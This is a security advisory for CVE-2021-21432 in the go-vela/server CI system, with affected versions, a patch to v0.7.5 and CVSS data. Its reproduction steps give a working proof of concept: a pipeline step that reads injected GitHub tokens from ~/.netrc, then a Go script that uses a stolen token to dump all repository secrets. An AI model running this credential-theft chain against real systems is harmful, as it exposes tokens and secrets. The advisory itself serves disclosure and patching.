CVE-2021-21432
HIGH7.5EPSS 0.30%Reject unauthorized access with GitHub PATs
Description
### Impact _What kind of vulnerability is it? Who is impacted?_ The additional auth mechanism added within https://github.com/go-vela/server/pull/246 enables some malicious user to obtain secrets utilizing the injected credentials within the `~/.netrc` file. Steps to reproduce 1. Create Vela server 2. Login to Vela UI 3. Promote yourself to Vela administrator - `UPDATE users SET admin = 't' WHERE name = <username>` 4. Activate repository within Vela 5. Add `.vela.yml` to the repository with the following content ```yaml version: "1" steps: - name: steal image: alpine commands: - cat ~/.netrc ``` 1. Look at build logs to find the following content ``` $ cat ~/.netrc machine <GITHUB URL> login x-oauth-basic password <token> ``` 1. Copy the password to be utilized in some later step 1. Add secret(s) to activated repo 1. Copy the following script into `main.go` ```golang package main import ( "fmt" "github.com/go-vela/sdk-go/vela" "os" ) func main() { // create client to connect to vela client, err := vela.NewClient(os.Getenv("VELA_SERVER_ADDR"), "vela", nil) if err != nil { panic(err) } // add PAT to request client.Authentication.SetPersonalAccessTokenAuth(os.Getenv("VELA_TOKEN")) secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{}) if err != nil { panic(err) } for _, secret := range *secrets { fmt.Println(*secret.Name) fmt.Println(*secret.Value) } } ``` 1. Run the `main.go` with environment specific settings - `VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously> go run main.go` The previously posted script could be updated to utilize any API endpoint(s) the activated user has access against. ### Patches _Has the problem been patched? What versions should users upgrade to?_ * Upgrade to `v0.7.5` or later ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ * No known workarounds ### References _Are there any links users can visit to find out more?_ * https://github.com/go-vela/server/pull/246 * https://docs.github.com/en/[email protected]/rest/reference/apps#check-a-token ### For more information If you have any questions or comments about this advisory * Email us at [[email protected]](mailto:[email protected])
Affected packages (2)
- Go/github.com/go-vela/server>= 0.7.0, < 0.7.5
- Go/github.com/go-vela/server>= 0.7.0, < 0.7.5
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L |
References (7)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2021-21432
- PATCHhttps://github.com/go-vela/server
- WEBhttps://github.com/go-vela/server/commit/cb4352918b8ecace9fe969b90404d337b0744d46
- WEBhttps://github.com/go-vela/server/pull/337
- WEBhttps://github.com/go-vela/server/releases/tag/v0.7.5
- WEBhttps://github.com/go-vela/server/security/advisories/GHSA-8j3f-mhq8-gmh4
- WEBhttps://pkg.go.dev/github.com/go-vela/server